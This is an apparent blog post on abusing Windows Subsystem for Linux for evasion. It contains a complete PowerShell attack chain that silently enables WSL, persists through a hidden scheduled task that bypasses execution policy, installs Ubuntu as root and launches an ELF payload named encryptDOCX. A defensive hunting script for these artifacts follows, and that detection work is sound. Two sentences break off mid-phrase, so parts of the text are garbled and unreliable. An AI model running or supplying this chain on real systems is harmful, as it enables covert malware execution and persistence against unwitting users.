Abusing WSL for Evasion
The Windows Subsystem for Linux (WSL) lets native Linux ELF64 binaries run on Windows.
From an attacker's point of view this is promising: since build 1809 (Windows 10 October 2018 Update) WSL distros can be installed from the command line. That means an attacker can enable WSL, install a Linux distro and execute malicious ELF files in the background, with no user interaction.
The C: drive is mounted on
The first PowerShell script enables WSL and downloads the Ubuntu1804 package; it also registers a scheduled task that executes the second script (resume.ps1), which installs the Ubuntu distro and executes the ELF file (encryptDOCX). All of this happens in the background, without any interaction from the user.
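As an added example (my own reconstruction, not the post's scripts): the two-stage chain described above, written as a single PowerShell script that re-runs itself from a scheduled task, so the part that runs after the reboot corresponds to resume.ps1. The staging directory, task name and download URL are assumptions; the ELF payload (encryptDOCX) is not included, and the first stage expects an elevated session because enabling a Windows optional feature requires one.

```powershell
# Added example, not the original post's scripts. Stage 1 runs elevated, enables WSL,
# fetches the distro package and schedules itself to resume at next logon. Stage 2
# (the post's resume.ps1) installs the distro and starts the ELF from /mnt/c.
# Paths, task name and the download URL are assumptions.
param([switch]$Resume)

$Stage    = 'C:\ProgramData\wslstage'          # assumed staging directory
$Appx     = Join-Path $Stage 'Ubuntu1804.appx'
$Payload  = Join-Path $Stage 'encryptDOCX'     # ELF named in the post; not included here
$TaskName = 'WslResume'                         # assumed task name
$ProgressPreference = 'SilentlyContinue'        # no progress UI from Invoke-WebRequest

if (-not $Resume) {
    # Stage 1: enable the feature without a prompt and without rebooting now.
    New-Item -ItemType Directory -Force -Path $Stage | Out-Null
    Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux -NoRestart | Out-Null

    # Download the Ubuntu 18.04 package. The aka.ms link is Microsoft's documented
    # short URL for it; treat it as an assumption if it has moved.
    Invoke-WebRequest -Uri 'https://aka.ms/wsl-ubuntu-1804' -OutFile $Appx -UseBasicParsing

    # Persist: at next logon, run this same script again with -Resume, hidden.
    # The feature only becomes usable after the reboot, so stage 2 waits for it.
    $action  = New-ScheduledTaskAction -Execute 'powershell.exe' `
        -Argument "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$PSCommandPath`" -Resume"
    $trigger = New-ScheduledTaskTrigger -AtLogOn
    Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger -Force | Out-Null
    return
}

# Stage 2 (resume.ps1 in the post): register the distro and run the ELF.
Add-AppxPackage -Path $Appx

# The Ubuntu launcher's 'install --root' creates no Linux user and asks no questions,
# so the whole install completes without any interaction.
& ubuntu1804.exe install --root

# The Windows C: drive is exposed inside the distro under /mnt/c (DrvFs), and files
# there are executable by default, so the ELF can be started directly from its
# Windows path. The launcher's 'run' subcommand executes a command line in the distro.
$linuxPath = '/mnt/c/' + ($Payload.Substring(3) -replace '\\', '/')
& ubuntu1804.exe run $linuxPath

# Tidy up the persistence once the payload has been launched.
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
```

The script is split into stages only because enabling the WSL feature needs a reboot; everything else is ordinary Windows administration, which is exactly why it blends in: the feature is enabled with DISM cmdlets, the distro comes from a Microsoft URL, and the ELF is started by a signed Microsoft launcher.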
I think it's much harder to detect/analyze a malicious ELF executable on
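Whatever the ELF itself does, the chain leaves Windows-side artifacts, so here is an added hunting script (not from the original post) that checks a host for them: the WSL feature state, distros registered under the Lxss registry key, scheduled tasks that start wsl.exe, bash.exe, a distro launcher or a .ps1, live WSL host processes, and recently written files that begin with the ELF magic in directories an attacker would plausibly stage from. The drop directories and the seven-day window are assumptions.

```powershell
# Added hunting script, not part of the original post. Drop directories and the
# age window are assumptions; adjust them for the environment being examined.
$findings = New-Object System.Collections.Generic.List[string]

# 1. Feature state: the DISM view says whether WSL has been enabled at all.
$feat = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
if ($feat.State -eq 'Enabled') { $findings.Add('WSL optional feature is enabled') }

# 2. Registered distros: one subkey per distro under the user's Lxss key, holding
#    DistributionName and the BasePath where the rootfs lives.
$lxss = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss'
$rootfsPaths = @()
if (Test-Path $lxss) {
    Get-ChildItem $lxss | ForEach-Object {
        $p = Get-ItemProperty $_.PSPath
        if ($p.DistributionName) {
            $findings.Add("Distro '$($p.DistributionName)' registered at $($p.BasePath)")
            $rootfsPaths += $p.BasePath
        }
    }
}

# 3. Persistence: tasks whose action launches wsl.exe, bash.exe, a distro launcher
#    such as ubuntu1804.exe, or a PowerShell script file.
Get-ScheduledTask | ForEach-Object {
    foreach ($a in $_.Actions) {
        $cmd = "$($a.Execute) $($a.Arguments)"
        if ($cmd -match '(?i)wsl\.exe|bash\.exe|ubuntu\d*\.exe|\.ps1') {
            $findings.Add("Task '$($_.TaskPath)$($_.TaskName)' runs: $cmd")
        }
    }
}

# 4. Live WSL host-side processes with their command lines.
Get-CimInstance Win32_Process |
    Where-Object { $_.Name -in @('wsl.exe', 'wslhost.exe', 'bash.exe') -or $_.Name -match '^ubuntu\d*\.exe$' } |
    ForEach-Object { $findings.Add("Process $($_.ProcessId) $($_.Name): $($_.CommandLine)") }

# 5. Dropped ELF files: read the first four bytes of recently written files under
#    likely staging locations and compare with the ELF magic 7F 45 4C 46.
#    Distro rootfs directories are skipped; they are full of legitimate ELF files.
$dropDirs = @("$env:ProgramData", "$env:PUBLIC", "$env:TEMP")   # assumed drop locations
$since    = (Get-Date).AddDays(-7)                                # assumed window
foreach ($dir in $dropDirs) {
    Get-ChildItem -Path $dir -Recurse -Depth 3 -File -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt $since -and $_.Length -ge 4 } |
        Where-Object { $f = $_.FullName; -not ($rootfsPaths | Where-Object { $f.StartsWith($_) }) } |
        ForEach-Object {
            $fs = $_.OpenRead()
            try {
                $hdr = New-Object byte[] 4
                [void]$fs.Read($hdr, 0, 4)
                if (($hdr -join ',') -eq '127,69,76,70') { $findings.Add("ELF header in $($_.FullName)") }
            } finally { $fs.Dispose() }
        }
}

$findings
```

None of these checks looks inside the ELF; they target the enable, download, persist and launch steps that have to happen on the Windows side, which is where logging and tooling already exist. The header scan is deliberately narrow, since a registered distro's rootfs contains thousands of legitimate ELF files and would drown the result.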